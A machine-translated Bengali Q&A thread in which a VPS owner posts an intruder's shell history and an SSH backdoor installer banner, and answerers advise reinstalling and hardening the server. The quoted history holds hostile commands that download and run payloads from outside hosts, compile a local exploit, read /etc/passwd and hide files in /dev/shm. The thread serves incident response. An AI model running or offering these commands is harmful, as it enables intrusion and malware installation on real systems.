ভিএসবারে এসএসএইচ ব্যাকডোর পাওয়া গেছে। কি করো?


24

গতকাল আমি আমার ভিএসবারে আমার কমান্ডের ইতিহাস পরীক্ষা করেছিলাম। আমি বেশ কয়েকটি সন্দেহজনক লাইন পেয়েছি।

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

বিশেষত sniffer.tgz আমাকে অবাক করেছে। আমি একটি ভার্চুয়াল মেশিন সেট আপ করেছি এবং এই টিজিজেড সংরক্ষণাগারটি ডাউনলোড করেছি। আমি সেটআপ শুরু করেছি এবং এটি আমাকে এই লাইন দিয়েছে:

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

কেউ কীভাবে এটি সরিয়ে ফেলতে জানেন?


উত্তর:


66

আপনার যে সমস্ত সিস্টেমে এটি sniffer.tgzচালু ছিল সেগুলিতে আপনার এটি করা উচিত: অরবিট থেকে তত্ক্ষণাত্ নুকে থেম , এবং একটি পরিষ্কার ইনস্টলেশন শুরু করুন। (এটি হ'ল সিস্টেম (গুলি) ধ্বংস করুন, পরিষ্কার পুনরায় ইনস্টল করুন, ক্লিন ব্যাকআপগুলি থেকে ডেটা লোড করুন - ধরে নিবেন যে আপনার ব্যাকআপ রয়েছে যা পরিষ্কার, এবং তারপরে ইন্টারনেটে ফিরিয়ে দেওয়ার আগে সিস্টেম (গুলি) শক্ত করুন।

যখনই আপনার ম্যালওয়্যার রয়েছে বা হ্যাকাররা আপনার সিস্টেমে এভাবে চলে আসে, এখন আপনার সিস্টেমটি কীভাবে কনফিগার করা হয়েছে তা পুনর্নবীকরণ করার এবং তারা যে পদক্ষেপগুলি পেয়েছিল সেগুলি পুনরায় না পুনরায় করার বিষয়টি নিশ্চিত করে নিন । তবে, কারণ এটি এমন কোনও সিস্টেম নাও হতে পারে যা আপনি একপাশে নিয়ে যেতে এবং ফরেনসিকালি বিশ্লেষণ করার ক্ষমতা রাখেন, এবং যেহেতু এটি আপনার একমাত্র সার্ভার হতে পারে, এখন সময় এসেছে ভার্চুয়াল সিস্টেমটি ধ্বংস করার, এবং স্ক্র্যাচ থেকে শুরু করার (যেমন আমি উপরে বলেছি)।

(এবং এটি সিস্টেমে ম্যালওয়্যার পাওয়ার ক্ষেত্রে এমন কোনও পরিস্থিতিতেই প্রযোজ্য। যদি আপনি এমন কিছু প্রতিস্থাপন করতে অতিরিক্ত হার্ডওয়্যার না ফেলে থাকেন তবে আপনি ভাঙা সিস্টেমটি বিচ্ছিন্নভাবে এবং বৈধভাবে পরীক্ষা করতে পারেন যা বেশিরভাগ ব্যবহারকারীর থাকে না, আপনার কোনও বিকল্প নেই তবে সিস্টেমটি অনুগ্রহ করে আবার শুরু করতে))

আপনার সার্ভারটি বিশ্লেষণ না করে আমি সত্যিই বলতে পারি না আপনি কী ভুল করেছেন, তবে সম্ভবত এটি সম্ভবত একটি সহজ 'প্রোগ্রাম' ইনস্টল হওয়া চেয়ে সিস্টেমে আরও গভীর। এবং, যেহেতু খারাপ লোকেরা ইতিমধ্যে আপনার সিস্টেমে একটি ব্যাকডোর ইনস্টল করেছে, আপনি ধরে নিতে পারেন যে আপনার সমস্ত পাসওয়ার্ড এখন লঙ্ঘিত হয়েছে এবং আর নিরাপদ নেই (এটি এসএসএইচ, বা মাইএসকিউএল রুট, বা যে কোনও পাসওয়ার্ড যা কখনও নেই এই কম্পিউটার সিস্টেমে প্রবেশ করা হয়েছে)। আপনার সমস্ত পাসওয়ার্ড পরিবর্তন করার সময় !


আপনি একবার পরিষ্কার পরিবেশে ফিরে আসার পরে, কঠোর পদক্ষেপগুলি বিবেচনা করার জন্য এখানে কয়েকটি প্রাথমিক পরামর্শ's নোট করুন যেহেতু এগুলি এটিকে আরও বেশি বিস্তৃত করে তোলে, তাই আমি এখানে প্রকৃতপক্ষে বিশদ খনন করতে পারি না, তবে অবশ্যই আপনার সিস্টেমটি সুরক্ষার জন্য কিছু কঠোর পদক্ষেপ গ্রহণ করার সময় এসেছে:

  1. একটি ফায়ারওয়াল চালু করুন এবং কেবল খোলার প্রয়োজন বন্দরগুলিতে অ্যাক্সেসের অনুমতি দিনufwসহজ হিসাবে বিদ্যমান, তাই আসুন এটি ব্যবহার করুন। sudo ufw enable। ( ufwআপনার পরিবেশের জন্য সঠিকভাবে কনফিগার করা একটি আলাদা গল্প এবং এটি এই প্রশ্নের সীমা ছাড়িয়ে যায়))

  2. রিমোট এসএসএইচে অ্যাক্সেস সীমাবদ্ধ করুন । এটি সর্বদা কার্যকর হয় না, তবে আপনি আদর্শভাবে আইপি ঠিকানাগুলি সনাক্ত করতে পারেন যা আপনার নিজের মালিকানাধীন এবং সেগুলিকে ফায়ারওয়ালে সুনির্দিষ্টভাবে সাদা তালিকাভুক্ত করা। (আপনি যদি কোনও গতিশীল আবাসিক আইপি ঠিকানাতে থাকেন তবে এই পদক্ষেপটি এড়িয়ে যান)।

  3. আপনার সার্ভারে এসএসএইচ অ্যাক্সেস লক ডাউন করুন এবং কেবলমাত্র প্রমাণীকরণের জন্য এসএসএইচ কী ব্যবহার করা প্রয়োজন । এইভাবে হ্যাকাররা আপনার সার্ভারে আক্রমণ করতে পারে না এবং চেষ্টা করে এবং কেবল পাসওয়ার্ড অনুমান করতে পারে। যথাযথ প্রাইভেট কীটি অনুমান করা অনেক বেশি কঠিন (কারণ আপনি তাদের সমস্তকেই নিখরচায় করতে হবে) এবং এটি আক্রমণাত্মক আক্রমণ থেকে রক্ষা করতে সহায়তা করে।

  4. আপনি যদি কোনও ওয়েবসাইট চালাচ্ছেন তবে অনুমতিগুলি লক করে দেওয়ার বিষয়টি নিশ্চিত করুন যাতে লোকেরা তাদের অবসর সময়ে জিনিসগুলি আপলোড / সম্পাদন করতে না পারে । এটির কাজটি সাইট থেকে অন্য সাইটে পরিবর্তিত হয়, তাই আমি এখানে আপনাকে আরও নির্দেশিকা দিতে পারি না (এটি করা অসম্ভব)।

  5. এছাড়াও আপনি যদি জুমলা বা ওয়ার্ডপ্রেস বা এ জাতীয় ব্যবহার করে কোনও ওয়েবসাইট চালাচ্ছেন তবে নিশ্চিত হন যে আপনি পরিবেশটি আপ টু ডেট রাখছেন এবং সফ্টওয়্যার সরবরাহকারীদের সুরক্ষা দুর্বলতার সাথে তাল মিলিয়ে

  6. যেখানে সম্ভব, আপনার কাছে অনুমোদিত জিনিসগুলির জন্য দ্বি-ফ্যাক্টর প্রমাণীকরণ (2 এফএ) পদ্ধতি সেটআপ, কনফিগার করুন এবং ব্যবহার করুন । বিভিন্ন আবেদনকারীর জন্য দ্বিতীয়-গুণক প্রমাণীকরণের জন্য অনেকগুলি সমাধান রয়েছে এবং বিভিন্ন অ্যাপ্লিকেশনকে এইভাবে সুরক্ষিত করা এই পোস্টের আওতার বাইরে, সুতরাং কোনও সমাধান বাছাইয়ের আগে আপনার এই গবেষণাটি করা উচিত।

  7. যদি আপনার সেটআপে অবশ্যই পাসওয়ার্ড ব্যবহার করতে হয় তবে একটি শালীন পাসওয়ার্ড ম্যানেজার ব্যবহার করুন (ক্লাউড-ভিত্তিকগুলি ভাল পছন্দ নয়) এবং দীর্ঘ-দৈর্ঘ্য (25+ অক্ষর), এলোমেলো, অবিস্মরণীয় পাসওয়ার্ড যা প্রতিটি পৃথক আইটেমের জন্য পৃথক হয় তা ব্যবহার করুন পাসওয়ার্ড দ্বারা সুরক্ষিত (তাই পাসওয়ার্ড পরিচালকের জন্য প্রস্তাবনা)। (তবে, আপনার পাসওয়ার্ডগুলি যেখানে সম্ভব নয় (যেমন এসএসএইচ প্রমাণীকরণের জন্য) ব্যবহার না করা এবং আপনি যেখানে সম্ভব সেখানে 2 এফএ ব্যবহার করার জোর বিবেচনা করা উচিত)।


মন্তব্যগুলি বর্ধিত আলোচনার জন্য নয়; এই কথোপকথন চ্যাটে সরানো হয়েছে ।
টেরডন

আমি উত্তরটি গ্রহণ করেছি, এটি আমি যা করতে যাচ্ছি তাই। কখনই আমি ভিএম এ ব্যাকডোর বন্ধ করার চেষ্টা করি না, কেবল আমার ব্যক্তিগত আগ্রহের জন্য।
এরকাজো

0

যদি একটি ব্যাকডোর থাকে তবে আরও 3 টি রয়েছে। বিচ্ছিন্ন, ব্যাকআপ ডেটা, এটিকে নাক করে, এবং সাবধানতার সাথে ডেটা পুনরুদ্ধার করুন any যে কোনও ক্রোন, পিএইচপি, বা এমনকি মাইএসকিএল ডেটা সম্পর্কে সতর্ক থাকুন, সেগুলি সমস্তই আপস হতে পারে। এই মুহুর্তে মনে রাখবেন তাদের কাছে আপনার সমস্ত পাসওয়ার্ড এবং হ্যাশ রয়েছে, সুতরাং আপনি যদি অন্য মেশিনগুলি একইভাবে কনফিগার করেছেন তবে তারা সম্ভবত সেগুলিও হ্যাক করেছে ... শক্ত অংশটি কীভাবে শুরু হয়েছিল তা নির্ধারণ করা হচ্ছে। আপনার যদি প্লাগইন / থিম ইত্যাদিতে ম্যালওয়ারের জন্য ওয়ার্ডপ্রেস সন্ধান করে ... আপনার অনুমতি চেক করুন, আপনার সর্বত্র 777 থাকতে পারে। কোন সহজ উত্তর নেই, আপনি অনেক কাজের দিকে তাকিয়ে আছেন।


অগত্যা একের বেশি নয়, তবে প্রায়শই বা সম্ভবত এটি সম্ভবত এটি নাও হতে পারে। এবং তাদের কাছে নিশ্চিতভাবে তাদের সমস্ত পাসওয়ার্ড নাও থাকতে পারে। তেমনি এটি "সম্ভাব্য" তারা অন্যান্য মেশিনগুলিকে হ্যাক করেছে, আপনি তাদের উদ্দেশ্যগুলি জানেন না বা কীটাকে স্নিগ্ধ করা হয়েছিল তা আপনি জানেন না বা যদি খারাপ প্রোগ্রামটি উপস্থিত থাকার বাইরেও সক্রিয় হয়ে থাকে বা কোনওভাবে চালানো হত। এবং "সাবধানতার সাথে ডেটা পুনরুদ্ধার করা" এমন কোনও কিছুর জন্য খুব সাধারণ পরামর্শ যা খুব সাবধানী ক্রিয়া প্রয়োজন।
জেমস
আমাদের সাইট ব্যবহার করে, আপনি স্বীকার করেছেন যে আপনি আমাদের কুকি নীতি এবং গোপনীয়তা নীতিটি পড়েছেন এবং বুঝতে পেরেছেন ।
Licensed under cc by-sa 3.0 with attribution required.